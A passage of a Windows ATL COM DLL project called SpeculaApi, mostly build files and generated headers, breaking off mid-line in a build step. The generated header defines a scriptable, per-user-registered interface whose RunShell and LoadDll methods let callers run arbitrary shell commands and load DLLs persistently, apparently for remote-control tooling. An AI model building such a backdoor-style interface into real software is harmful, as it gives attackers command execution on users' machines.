<MkTypLibCompatible>false</MkTypLibCompatible>
<TargetEnvironment>Win32</TargetEnvironment>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<HeaderFileName>SpeculaApi_i.h</HeaderFileName>
<InterfaceIdentifierFileName>SpeculaApi_i.c</InterfaceIdentifierFileName>
<ProxyFileName>SpeculaApi_p.c</ProxyFileName>
<GenerateStublessProxies>true</GenerateStublessProxies>
<TypeLibraryName>$(IntDir)SpeculaApi.tlb</TypeLibraryName>
<DllDataFileName />
<ValidateAllParameters>true</ValidateAllParameters>
</Midl>
<ResourceCompile>
<Culture>0x0409</Culture>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>.\SpeculaApi.def</ModuleDefinitionFile>
<RegisterOutput>true</RegisterOutput>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<PreprocessorDefinitions>WIN32;_WINDOWS;NDEBUG;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
<SDLCheck>true</SDLCheck>
<DebugInformationFormat>None</DebugInformationFormat>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<TargetEnvironment>Win32</TargetEnvironment>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<HeaderFileName>SpeculaApi_i.h</HeaderFileName>
<InterfaceIdentifierFileName>SpeculaApi_i.c</InterfaceIdentifierFileName>
<ProxyFileName>SpeculaApi_p.c</ProxyFileName>
<GenerateStublessProxies>true</GenerateStublessProxies>
<TypeLibraryName>$(IntDir)SpeculaApi.tlb</TypeLibraryName>
<DllDataFileName />
<ValidateAllParameters>true</ValidateAllParameters>
</Midl>
<ResourceCompile>
<Culture>0x0409</Culture>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>.\SpeculaApi.def</ModuleDefinitionFile>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<PreprocessorDefinitions>_WINDOWS;NDEBUG;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
<SDLCheck>true</SDLCheck>
<DebugInformationFormat>None</DebugInformationFormat>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<HeaderFileName>SpeculaApi_i.h</HeaderFileName>
<InterfaceIdentifierFileName>SpeculaApi_i.c</InterfaceIdentifierFileName>
<ProxyFileName>SpeculaApi_p.c</ProxyFileName>
<GenerateStublessProxies>true</GenerateStublessProxies>
<TypeLibraryName>$(IntDir)SpeculaApi.tlb</TypeLibraryName>
<DllDataFileName />
<ValidateAllParameters>true</ValidateAllParameters>
</Midl>
<ResourceCompile>
<Culture>0x0409</Culture>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>.\SpeculaApi.def</ModuleDefinitionFile>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="dllmain.h" />
<ClInclude Include="framework.h" />
<ClInclude Include="pch.h" />
<ClInclude Include="Resource.h" />
<ClInclude Include="Sepcula.h" />
<ClInclude Include="SpeculaApi_i.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="dllmain.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="pch.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
<ClCompile Include="Sepcula.cpp" />
<ClCompile Include="SpeculaApi.cpp" />
<ClCompile Include="SpeculaApi_i.c">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="SpeculaApi.rc" />
</ItemGroup>
<ItemGroup>
<None Include="Sepcula.rgs" />
<None Include="SpeculaApi.def" />
<None Include="SpeculaApi.rgs" />
</ItemGroup>
<ItemGroup>
<Midl Include="SpeculaApi.idl" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: api/SpeculaApi/SpeculaApi.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Generated Files">
<UniqueIdentifier>{53bbe418-42c7-4cd4-a4d9-3d1ca2106f6e}</UniqueIdentifier>
<SourceControlFiles>False</SourceControlFiles>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="framework.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="dllmain.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="SpeculaApi_i.h">
<Filter>Generated Files</Filter>
</ClInclude>
<ClInclude Include="pch.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Sepcula.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="SpeculaApi.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="dllmain.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="SpeculaApi_i.c">
<Filter>Generated Files</Filter>
</ClCompile>
<ClCompile Include="pch.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Sepcula.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="SpeculaApi.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
<ItemGroup>
<None Include="SpeculaApi.rgs">
<Filter>Resource Files</Filter>
</None>
<None Include="SpeculaApi.def">
<Filter>Source Files</Filter>
</None>
<None Include="Sepcula.rgs">
<Filter>Resource Files</Filter>
</None>
</ItemGroup>
<ItemGroup>
<Midl Include="SpeculaApi.idl">
<Filter>Source Files</Filter>
</Midl>
</ItemGroup>
</Project>
================================================
FILE: api/SpeculaApi/SpeculaApi_i.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0628 */
/* at Mon Jan 18 21:14:07 2038
*/
/* Compiler settings for SpeculaApi.idl:
Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0628
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */
#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/
#ifndef __SpeculaApi_i_h__
#define __SpeculaApi_i_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#ifndef DECLSPEC_XFGVIRT
#if defined(_CONTROL_FLOW_GUARD_XFG)
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif
/* Forward Declarations */
#ifndef __ISepcula_FWD_DEFINED__
#define __ISepcula_FWD_DEFINED__
typedef interface ISepcula ISepcula;
#endif /* __ISepcula_FWD_DEFINED__ */
#ifndef __Sepcula_FWD_DEFINED__
#define __Sepcula_FWD_DEFINED__
#ifdef __cplusplus
typedef class Sepcula Sepcula;
#else
typedef struct Sepcula Sepcula;
#endif /* __cplusplus */
#endif /* __Sepcula_FWD_DEFINED__ */
/* header files for imported files */
#include "oaidl.h"
#include "ocidl.h"
#include "shobjidl.h"
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __ISepcula_INTERFACE_DEFINED__
#define __ISepcula_INTERFACE_DEFINED__
/* interface ISepcula */
/* [unique][nonextensible][dual][uuid][object] */
EXTERN_C const IID IID_ISepcula;
#if defined(__cplusplus) && !defined(CINTERFACE)
MIDL_INTERFACE("b0f5f947-8064-48f7-a623-5c058dc91cc8")
ISepcula : public IDispatch
{
public:
virtual /* [id] */ HRESULT STDMETHODCALLTYPE RunShell(
/* [in] */ BSTR cmd,
/* [optional][in] */ VARIANT timeout,
/* [retval][out] */ BSTR *result) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE LoadDll(
/* [in] */ BSTR path,
/* [in] */ boolean persist,
/* [retval][out] */ boolean *status) = 0;
};
#else /* C style interface */
typedef struct ISepculaVtbl
{
BEGIN_INTERFACE
DECLSPEC_XFGVIRT(IUnknown, QueryInterface)
HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
ISepcula * This,
/* [in] */ REFIID riid,
/* [annotation][iid_is][out] */
_COM_Outptr_ void **ppvObject);
DECLSPEC_XFGVIRT(IUnknown, AddRef)
ULONG ( STDMETHODCALLTYPE *AddRef )(
ISepcula * This);
DECLSPEC_XFGVIRT(IUnknown, Release)
ULONG ( STDMETHODCALLTYPE *Release )(
ISepcula * This);
DECLSPEC_XFGVIRT(IDispatch, GetTypeInfoCount)
HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
ISepcula * This,
/* [out] */ UINT *pctinfo);
DECLSPEC_XFGVIRT(IDispatch, GetTypeInfo)
HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
ISepcula * This,
/* [in] */ UINT iTInfo,
/* [in] */ LCID lcid,
/* [out] */ ITypeInfo **ppTInfo);
DECLSPEC_XFGVIRT(IDispatch, GetIDsOfNames)
HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
ISepcula * This,
/* [in] */ REFIID riid,
/* [size_is][in] */ LPOLESTR *rgszNames,
/* [range][in] */ UINT cNames,
/* [in] */ LCID lcid,
/* [size_is][out] */ DISPID *rgDispId);
DECLSPEC_XFGVIRT(IDispatch, Invoke)
/* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )(
ISepcula * This,
/* [annotation][in] */
_In_ DISPID dispIdMember,
/* [annotation][in] */
_In_ REFIID riid,
/* [annotation][in] */
_In_ LCID lcid,
/* [annotation][in] */
_In_ WORD wFlags,
/* [annotation][out][in] */
_In_ DISPPARAMS *pDispParams,
/* [annotation][out] */
_Out_opt_ VARIANT *pVarResult,
/* [annotation][out] */
_Out_opt_ EXCEPINFO *pExcepInfo,
/* [annotation][out] */
_Out_opt_ UINT *puArgErr);
DECLSPEC_XFGVIRT(ISepcula, RunShell)
/* [id] */ HRESULT ( STDMETHODCALLTYPE *RunShell )(
ISepcula * This,
/* [in] */ BSTR cmd,
/* [optional][in] */ VARIANT timeout,
/* [retval][out] */ BSTR *result);
DECLSPEC_XFGVIRT(ISepcula, LoadDll)
/* [id] */ HRESULT ( STDMETHODCALLTYPE *LoadDll )(
ISepcula * This,
/* [in] */ BSTR path,
/* [in] */ boolean persist,
/* [retval][out] */ boolean *status);
END_INTERFACE
} ISepculaVtbl;
interface ISepcula
{
CONST_VTBL struct ISepculaVtbl *lpVtbl;
};
#ifdef COBJMACROS
#define ISepcula_QueryInterface(This,riid,ppvObject) \
( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) )
#define ISepcula_AddRef(This) \
( (This)->lpVtbl -> AddRef(This) )
#define ISepcula_Release(This) \
( (This)->lpVtbl -> Release(This) )
#define ISepcula_GetTypeInfoCount(This,pctinfo) \
( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) )
#define ISepcula_GetTypeInfo(This,iTInfo,lcid,ppTInfo) \
( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) )
#define ISepcula_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) \
( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) )
#define ISepcula_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) \
( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) )
#define ISepcula_RunShell(This,cmd,timeout,result) \
( (This)->lpVtbl -> RunShell(This,cmd,timeout,result) )
#define ISepcula_LoadDll(This,path,persist,status) \
( (This)->lpVtbl -> LoadDll(This,path,persist,status) )
#endif /* COBJMACROS */
#endif /* C style interface */
#endif /* __ISepcula_INTERFACE_DEFINED__ */
#ifndef __SpeculaApiLib_LIBRARY_DEFINED__
#define __SpeculaApiLib_LIBRARY_DEFINED__
/* library SpeculaApiLib */
/* [version][uuid] */
EXTERN_C const IID LIBID_SpeculaApiLib;
EXTERN_C const CLSID CLSID_Sepcula;
#ifdef __cplusplus
class DECLSPEC_UUID("e8b55279-c6b4-48f3-8138-b727337c0236")
Sepcula;
#endif
#endif /* __SpeculaApiLib_LIBRARY_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
unsigned long __RPC_USER BSTR_UserSize( unsigned long *, unsigned long , BSTR * );
unsigned char * __RPC_USER BSTR_UserMarshal( unsigned long *, unsigned char *, BSTR * );
unsigned char * __RPC_USER BSTR_UserUnmarshal(unsigned long *, unsigned char *, BSTR * );
void __RPC_USER BSTR_UserFree( unsigned long *, BSTR * );
unsigned long __RPC_USER VARIANT_UserSize( unsigned long *, unsigned long , VARIANT * );
unsigned char * __RPC_USER VARIANT_UserMarshal( unsigned long *, unsigned char *, VARIANT * );
unsigned char * __RPC_USER VARIANT_UserUnmarshal(unsigned long *, unsigned char *, VARIANT * );
void __RPC_USER VARIANT_UserFree( unsigned long *, VARIANT * );
unsigned long __RPC_USER BSTR_UserSize64( unsigned long *, unsigned long , BSTR * );
unsigned char * __RPC_USER BSTR_UserMarshal64( unsigned long *, unsigned char *, BSTR * );
unsigned char * __RPC_USER BSTR_UserUnmarshal64(unsigned long *, unsigned char *, BSTR * );
void __RPC_USER BSTR_UserFree64( unsigned long *, BSTR * );
unsigned long __RPC_USER VARIANT_UserSize64( unsigned long *, unsigned long , VARIANT * );
unsigned char * __RPC_USER VARIANT_UserMarshal64( unsigned long *, unsigned char *, VARIANT * );
unsigned char * __RPC_USER VARIANT_UserUnmarshal64(unsigned long *, unsigned char *, VARIANT * );
void __RPC_USER VARIANT_UserFree64( unsigned long *, VARIANT * );
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: api/SpeculaApi/SpeculaApips.def
================================================
LIBRARY
EXPORTS
DllGetClassObject PRIVATE
DllCanUnloadNow PRIVATE
DllRegisterServer PRIVATE
DllUnregisterServer PRIVATE
================================================
FILE: api/SpeculaApi/dllmain.cpp
================================================
// dllmain.cpp : Implementation of DllMain.
#include "pch.h"
#include "framework.h"
#include "resource.h"
#include "SpeculaApi_i.h"
#include "dllmain.h"
CSpeculaApiModule _AtlModule;
// DLL Entry Point
extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
hInstance;
return _AtlModule.DllMain(dwReason, lpReserved);
}
================================================
FILE: api/SpeculaApi/dllmain.h
================================================
// dllmain.h : Declaration of module class.
class CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule >
{
public :
DECLARE_LIBID(LIBID_SpeculaApiLib)
DECLARE_REGISTRY_APPID_RESOURCEID(IDR_SPECULAAPI, "{5be8ef76-6253-482a-926e-d1d877de3b63}")
};
extern class CSpeculaApiModule _AtlModule;
================================================
FILE: api/SpeculaApi/framework.h
================================================
#pragma once
#ifndef STRICT
#define STRICT
#endif
#include "targetver.h"
#define _ATL_APARTMENT_THREADED
#define _ATL_NO_AUTOMATIC_NAMESPACE
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit
#define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW
#include "resource.h"
#include <atlbase.h>
#include <atlcom.h>
#include <atlctl.h>
================================================
FILE: api/SpeculaApi/pch.cpp
================================================
// pch.cpp: source file corresponding to the pre-compiled header
#include "pch.h"
// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
================================================
FILE: api/SpeculaApi/pch.h
================================================
// pch.h: This is a precompiled header file.
// Files listed below are compiled only once, improving build performance for future builds.
// This also affects IntelliSense performance, including code completion and many code browsing features.
// However, files listed here are ALL re-compiled if any one of them is updated between builds.
// Do not add files here that you will be updating frequently as this negates the performance advantage.
#ifndef PCH_H
#define PCH_H
// add headers that you want to pre-compile here
#include "framework.h"
#endif //PCH_H
================================================
FILE: api/SpeculaApi/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by SpeculaApi.rc
//
#define IDS_PROJNAME 100
#define IDR_SPECULAAPI 101
#define IDR_SEPCULA 106
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 201
#define _APS_NEXT_COMMAND_VALUE 32768
#define _APS_NEXT_CONTROL_VALUE 201
#define _APS_NEXT_SYMED_VALUE 107
#endif
#endif
================================================
FILE: api/SpeculaApi/targetver.h
================================================
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>
================================================
FILE: api/SpeculaApi.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.7.34202.233
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SpeculaApi", "SpeculaApi\SpeculaApi.vcxproj", "{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SpeculaApiPS", "SpeculaApiPS\SpeculaApiPS.vcxproj", "{B58767EE-5185-4E99-818F-6285332400E6}"
ProjectSection(ProjectDependencies) = postProject
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB} = {AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}
EndProjectSection
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x64.ActiveCfg = Debug|x64
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x64.Build.0 = Debug|x64
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x86.ActiveCfg = Debug|Win32
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x86.Build.0 = Debug|Win32
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x64.ActiveCfg = Release|x64
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x64.Build.0 = Release|x64
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x86.ActiveCfg = Release|Win32
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x86.Build.0 = Release|Win32
{B58767EE-5185-4E99-818F-6285332400E6}.Debug|x64.ActiveCfg = Debug|x64
{B58767EE-5185-4E99-818F-6285332400E6}.Debug|x86.ActiveCfg = Debug|Win32
{B58767EE-5185-4E99-818F-6285332400E6}.Release|x64.ActiveCfg = Release|x64
{B58767EE-5185-4E99-818F-6285332400E6}.Release|x86.ActiveCfg = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {98C14C87-B4F7-4E1C-B61E-D945B7763368}
EndGlobalSection
EndGlobal
================================================
FILE: api/SpeculaApiPS/SpeculaApiPS.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>17.0</VCProjectVersion>
<ProjectGuid>{B58767EE-5185-4E99-818F-6285332400E6}</ProjectGuid>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<Keyword>AtlPSProj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<IntDir>$(Configuration)PS\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IntDir>$(Configuration)PS\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IntDir>$(Configuration)PS\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<IntDir>$(Configuration)PS\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PreprocessorDefinitions>REGISTER_PROXY_DLL;_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<AdditionalDependencies>kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)</AdditionalDependencies>
<ModuleDefinitionFile>SpeculaApiPS.def</ModuleDefinitionFile>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
</Link>
<PreBuildEvent>
<Command>if exist dlldata.c goto :END
